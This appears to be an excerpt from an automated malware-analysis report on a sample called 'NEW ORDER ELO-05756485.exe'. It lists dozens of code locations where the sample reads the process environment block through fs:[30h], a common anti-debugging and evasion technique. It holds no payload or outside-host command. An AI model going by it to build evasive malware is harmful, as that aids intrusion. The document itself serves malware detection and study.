          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01330050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01330050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01393884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01393884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01343B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01343B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01321B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01321B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01354A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01354A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01315210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01333A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01328A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0139A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01337D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01353D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01393540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
